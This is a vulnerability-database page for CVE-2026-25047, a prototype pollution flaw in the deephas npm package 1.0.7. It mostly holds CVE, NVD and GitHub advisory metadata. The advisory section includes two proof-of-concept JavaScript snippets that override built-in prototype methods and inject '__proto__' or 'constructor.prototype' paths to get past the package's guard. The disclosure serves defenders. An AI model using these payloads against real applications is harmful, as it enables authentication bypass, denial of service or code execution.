Vulnerability-Lookup

CVE-2026-25047 (GCVE-0-2026-25047)

Vulnerability from cvelistv5 – Published: 2026-01-29 21:39 – Updated: 2026-02-02 16:35

Title

deepHas vulnerable to Prototype Pollution via constructor.prototype

Summary

deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.

Severity

9.4 (Critical)


                        
                          CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

SSVC

Exploitation: none Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/sharpred/deepHas/security/advi…	x_refsource_CONFIRM
https://github.com/sharpred/deepHas/commit/8097fa…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
sharpred	deepHas	Affected: < 1.0.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25047",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-30T14:48:51.987434Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-02T16:35:22.701Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "deepHas",
          "vendor": "sharpred",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-29T21:39:48.498Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27"
        },
        {
          "name": "https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465"
        }
      ],
      "source": {
        "advisory": "GHSA-2733-6c58-pf27",
        "discovery": "UNKNOWN"
      },
      "title": "deepHas vulnerable to Prototype Pollution via constructor.prototype"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25047",
    "datePublished": "2026-01-29T21:39:48.498Z",
    "dateReserved": "2026-01-28T14:50:47.886Z",
    "dateUpdated": "2026-02-02T16:35:22.701Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-25047",
      "date": "2026-06-02",
      "epss": "0.00169",
      "percentile": "0.37817"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25047\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-29T22:15:55.647\",\"lastModified\":\"2026-02-25T15:13:28.610\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.\"},{\"lang\":\"es\",\"value\":\"deepHas proporciona una prueba para la existencia de una clave de objeto anidado y opcionalmente devuelve esa clave. Existe una vulnerabilidad de contaminaci\u00f3n de prototipos en la versi\u00f3n 1.0.7 del paquete npm deephas que permite a un atacante modificar el comportamiento de objetos globales. Este problema fue solucionado en la versi\u00f3n 1.0.8.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.0,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sharpred:deephas:1.0.7:*:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"0D998147-9A29-4864-97BD-88D814F73D54\"}]}]}],\"references\":[{\"url\":\"https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25047\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-30T14:48:51.987434Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-30T14:48:56.330Z\"}}], \"cna\": {\"title\": \"deepHas vulnerable to Prototype Pollution via constructor.prototype\", \"source\": {\"advisory\": \"GHSA-2733-6c58-pf27\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9.4, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"sharpred\", \"product\": \"deepHas\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.0.7\"}]}], \"references\": [{\"url\": \"https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27\", \"name\": \"https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465\", \"name\": \"https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1321\", \"description\": \"CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-29T21:39:48.498Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25047\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-02T16:35:22.701Z\", \"dateReserved\": \"2026-01-28T14:50:47.886Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-29T21:39:48.498Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-25047

Vulnerability from fkie_nvd - Published: 2026-01-29 22:15 - Updated: 2026-02-25 15:13

Severity

8.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465	Patch
	security-advisories@github.com	https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	sharpred	deephas	1.0.7

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sharpred:deephas:1.0.7:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "0D998147-9A29-4864-97BD-88D814F73D54",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8."
    },
    {
      "lang": "es",
      "value": "deepHas proporciona una prueba para la existencia de una clave de objeto anidado y opcionalmente devuelve esa clave. Existe una vulnerabilidad de contaminaci\u00f3n de prototipos en la versi\u00f3n 1.0.7 del paquete npm deephas que permite a un atacante modificar el comportamiento de objetos globales. Este problema fue solucionado en la versi\u00f3n 1.0.8."
    }
  ],
  "id": "CVE-2026-25047",
  "lastModified": "2026-02-25T15:13:28.610",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.0,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.4,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-29T22:15:55.647",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-2733-6C58-PF27

Vulnerability from github – Published: 2026-01-29 22:21 – Updated: 2026-02-27 20:45

Summary

deepHas vulnerable to Prototype Pollution via constructor.prototype

Details

Summary

A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.

Details

The vulnerability resides in the add() function and indexer() function implemented within deepHas.js. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC

By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or proto.polluted resulting in prototype pollution.

This issue affects all JavaScript runtimes that rely on npm packages (including Node.js, Deno, and Bun) and is independent of the operating system.

PoC

Steps to reproduce

Install version 1.0.7 of deephas using npm install
Run one of the following code snippets:

//PoC 1
Object.prototype.hasOwnProperty = () => true;
console.log({}.polluted);
const dh = require('deephas');
let obj = {};
dh.set(obj, 'constructor.prototype.polluted', 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred

//PoC 2
String.prototype.indexOf = () => -1;
console.log({}.polluted);
const dh = require('deephas');
let obj = {};
dh.set(obj, '__proto__.polluted', 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred

Expected behavior

Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:

undefined
undefined OR throw an Error

Actual behavior

Object.prototype is polluted and the property polluted becomes globally accessible. This is printed on the console:

undefined
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how deephas is used by downstream applications. Any application that processes attacker-controlled input using deephas.set may be affected. It could potentially lead to the following problems: 1. Authentication bypass 2. Denial of service 4. Remote code execution (if polluted property is passed to sinks like eval or child_process)

Severity

9.4 (Critical)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "deephas"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25047"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-29T22:21:32Z",
    "nvd_published_at": "2026-01-29T22:15:55Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.\n\n### Details\nThe vulnerability resides in the `add()` function and `indexer()` function implemented within `deepHas.js`. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC\n\nBy doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or __proto__.polluted resulting in prototype pollution.\n\nThis issue affects all JavaScript runtimes that rely on npm packages (including Node.js, Deno, and Bun) and is independent of the operating system.\n\n### PoC\n#### Steps to reproduce\n1. Install version 1.0.7 of `deephas` using npm install\n2. Run one of the following code snippets:\n\n```javascript\n//PoC 1\nObject.prototype.hasOwnProperty = () =\u003e true;\nconsole.log({}.polluted);\nconst dh = require(\u0027deephas\u0027);\nlet obj = {};\ndh.set(obj, \u0027constructor.prototype.polluted\u0027, \u0027yes\u0027);\nconsole.log(\u0027{ \u0027 + obj.polluted + \u0027, \u0027 + \u0027yes\u0027 + \u0027 }\u0027); // prints yes =\u003e the patch is bypassed and prototype pollution occurred\n```\nOR\n\n```javascript\n//PoC 2\nString.prototype.indexOf = () =\u003e -1;\nconsole.log({}.polluted);\nconst dh = require(\u0027deephas\u0027);\nlet obj = {};\ndh.set(obj, \u0027__proto__.polluted\u0027, \u0027yes\u0027);\nconsole.log(\u0027{ \u0027 + obj.polluted + \u0027, \u0027 + \u0027yes\u0027 + \u0027 }\u0027); // prints yes =\u003e the patch is bypassed and prototype pollution occurred\n```\n\n#### Expected behavior\nPrototype pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\nObject.prototype is polluted and the property polluted becomes globally accessible.\nThis is printed on the console:\n```\nundefined\nyes\n```\n\n### Impact\nThis is a prototype pollution vulnerability, which can have severe security implications depending on how deephas is used by downstream applications. Any application that processes attacker-controlled input using `deephas.set` may be affected.\nIt could potentially lead to the following problems:\n1. Authentication bypass\n2. Denial of service\n4. Remote code execution (if polluted property is passed to sinks like eval or child_process)",
  "id": "GHSA-2733-6c58-pf27",
  "modified": "2026-02-27T20:45:38Z",
  "published": "2026-01-29T22:21:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25047"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sharpred/deepHas/commit/8097fafd3776c613d8066546653e0d2c7b5fc465"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sharpred/deepHas"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "deepHas vulnerable to Prototype Pollution via constructor.prototype"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25047 (GCVE-0-2026-25047)

FKIE_CVE-2026-25047

GHSA-2733-6C58-PF27

Summary

Details

PoC

Steps to reproduce

Expected behavior

Actual behavior

Impact

Tags

Sightings

Nomenclature